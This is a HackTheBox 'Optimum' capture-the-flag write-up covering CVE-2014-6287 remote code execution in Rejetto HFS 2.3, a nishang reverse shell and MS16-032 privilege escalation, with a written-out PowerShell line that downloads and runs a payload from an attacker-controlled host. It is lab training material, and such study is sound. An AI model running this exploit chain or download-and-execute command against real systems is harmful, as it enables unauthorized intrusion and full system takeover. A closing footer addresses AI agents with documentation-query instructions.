# HackTheBox - Optimum

![](/files/-MYEz0XG-1ic3xVGYWGa)

### Nmap scan (Basic and all port)

![](/files/-MYEzMunNNe7tjR8v0so)

All port scan gave us the same results, so our main intention is to lookout at port 80 (HTTP Server)

### Website Surface Testing

![](/files/-MYEziLI_dDgiobZBXLv)

Looks like the website is running Rejetto HTTP File Server. There was a known vulnerability for this specific version. Version Running: `HttpFileServer 2.3`

We can use searchsploit or can even use google to checkout the vulnerability.

### CVE-2014-6287 (Exploit)

![](/files/-MYF-Dtzq3FtJBN5CFMt)

![](/files/-MYF-4IcDs0b4GealYFd)

{% hint style="info" %}
From rejetto wiki. Also known as template macros, these are commands with some useful effects that users can input in **HFS** to improve a template or to create functionality not otherwise available.
{% endhint %}

```
References: 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287
https://www.exploit-db.com/exploits/39161
```

### Manual Exploitation

The search parameter is vulnerable and we can write HFS script to get Remote Code Execution.

![](/files/-MYFPFn41C-XdypvEliP)

![](/files/-MYFPL0fi_DUTPeo260h)

We get a ping request back, that means we can have RCE. Let's try to get a reverse shell using powershell. We will use nishang's `Invoke-PowershellTCP.ps1` script to get a connection back.

Github link: <https://github.com/samratashok/nishang/tree/master/Shells>

{% hint style="info" %}
Note : Make sure to URL encode the payload.
{% endhint %}

![](/files/-MYFQJEpz_CVHwrDmJuL)

![](/files/-MYFQSZSoRd7y7-jn_TZ)

### Running Sherlock.ps1 (By Rastamouse)

![](/files/-MYFRXSeqkLzwjYpb_jq)

![](/files/-MYFRw8Xg5c8IsmAbYtg)

Github Link : <https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16032.ps1>

So the system looks vulnerable to MS16-032 Secondary Logon Handle Privilege Escalation. We can get the script from exploit.db but Empire already has a modified script and we can use that.

### MS16-032 Exploitation (Secondary Logon Handle Privilege Escalation)

Add the following line of code at the end of MS16-032 script and edit it according to your need.

```
Invoke-MS16032 -Command "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell2.ps1')" 
```

![](/files/-MYFSssgFqFXaa4leAyF)

![](/files/-MYFTMU-Rv9B9Fv5BVpo)

![](/files/-MYFTPqw1JIXwpxyh8Su)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://akshaydeepakshinde.gitbook.io/hackthebox-windows/hackthebox-optimum.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.